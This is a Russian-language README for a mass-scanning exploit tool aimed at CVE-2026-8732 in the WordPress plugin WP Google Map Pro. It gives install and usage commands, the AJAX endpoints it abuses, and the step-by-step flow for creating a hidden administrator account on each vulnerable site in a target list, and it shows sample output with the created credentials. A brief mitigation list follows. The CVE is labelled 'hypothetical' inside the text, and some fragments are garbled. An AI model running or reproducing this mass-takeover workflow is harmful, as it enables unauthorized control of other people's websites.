
Многопоточный массовый сканер для CVE-2026-8732 в WordPress WP Google Map Pro. Автоматизирует извлечение nonce, эксплуатацию токенов и создание скрытой учётной записи администратора на уязвимых сайтах.
Этот инструмент эксплуатирует CVE-2026-8732 — уязвимость в плагине WP Google Map Pro для WordPress. Уязвимость позволяет неаутентифицированному злоумышленнику получить действительный wpmp_token через AJAX-эндпоинт (admin-ajax.php?action=wpgmp_temp_access_ajax). Используя этот токен, злоумышленник может получить доступ к панели администратора WordPress и создать нового пользователя с правами администратора.
Инструмент выполняет массовое сканирование из списка доменов, извлекает nonce и токен, а затем автоматически создаёт скрытую учётную запись администратора на уязвимых сайтах. Результаты сохраняются в реальном времени с полными данными токена.
admin_created.txthttp://, так и https://requestsУстановите необходимую библиотеку:
pip install requests
🚀 Установка
git clone https://github.com/CVE-2026-8732-POC/CVE-2026-8732.git
cd CVE-2026-8732
🎯 Использование
Подготовьте файл со списком целей (один домен на строку):
example.com
https://target-website.com
http://vulnerable-site.org
Запустите сканер:
python2 exploit.py targets.txt
Выходные файлы
Файл Содержимое res.txt Уязвимые домены с полным токеном и URL перенаправления (если есть) admin_created.txt Успешно созданные учётные данные администратора (домен, имя пользователя, пароль, email)
Пример вывода
[*] Checking: https://example.com
[VULNERABLE] https://example.com -> Token found
[*] https://example.com -> Accessing redirect URL...
[+] https://example.com -> Admin created: securityaudit_1734567890 / StrongP@ssw0rd123!
⚙️ Конфигурация
Отредактируйте следующие переменные внутри скрипта:
TIMEOUT = 10 # Request timeout in seconds
JUMLAH_THREAD = 10 # Number of concurrent threads
OUTPUT_FILE = "res.txt" # File for vulnerable results
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "[email protected]"
🧠 Как это работает
wpgmp_local или fc-call-nonce из HTML./wp-admin/admin-ajax.php с параметрами action=wpgmp_temp_access_ajax и полученным nonce./wp-admin/user-new.php, извлекает _wpnonce_create-user и отправляет POST-запрос для создания нового пользователя с правами администратора.users.php или ищет новое имя пользователя в списке пользователей для подтверждения успеха.🛡️ Меры защиты
wpgmp_temp_access_ajax с помощью пользовательского кода или брандмауэра.admin-ajax.php.| Поле | Значение |
|---|
| CVE ID | CVE-2026-8732 (гипотетический для этого плагина) |
| Затронутый плагин | WP Google Map Pro (версии <= 1.5.0) |
| Тип уязвимости | Нарушение контроля доступа / повышение привилегий |
| Вектор атаки | Неаутентифицированный, удаленный |
| Воздействие | Полный захват сайта через создание учётной записи администратора |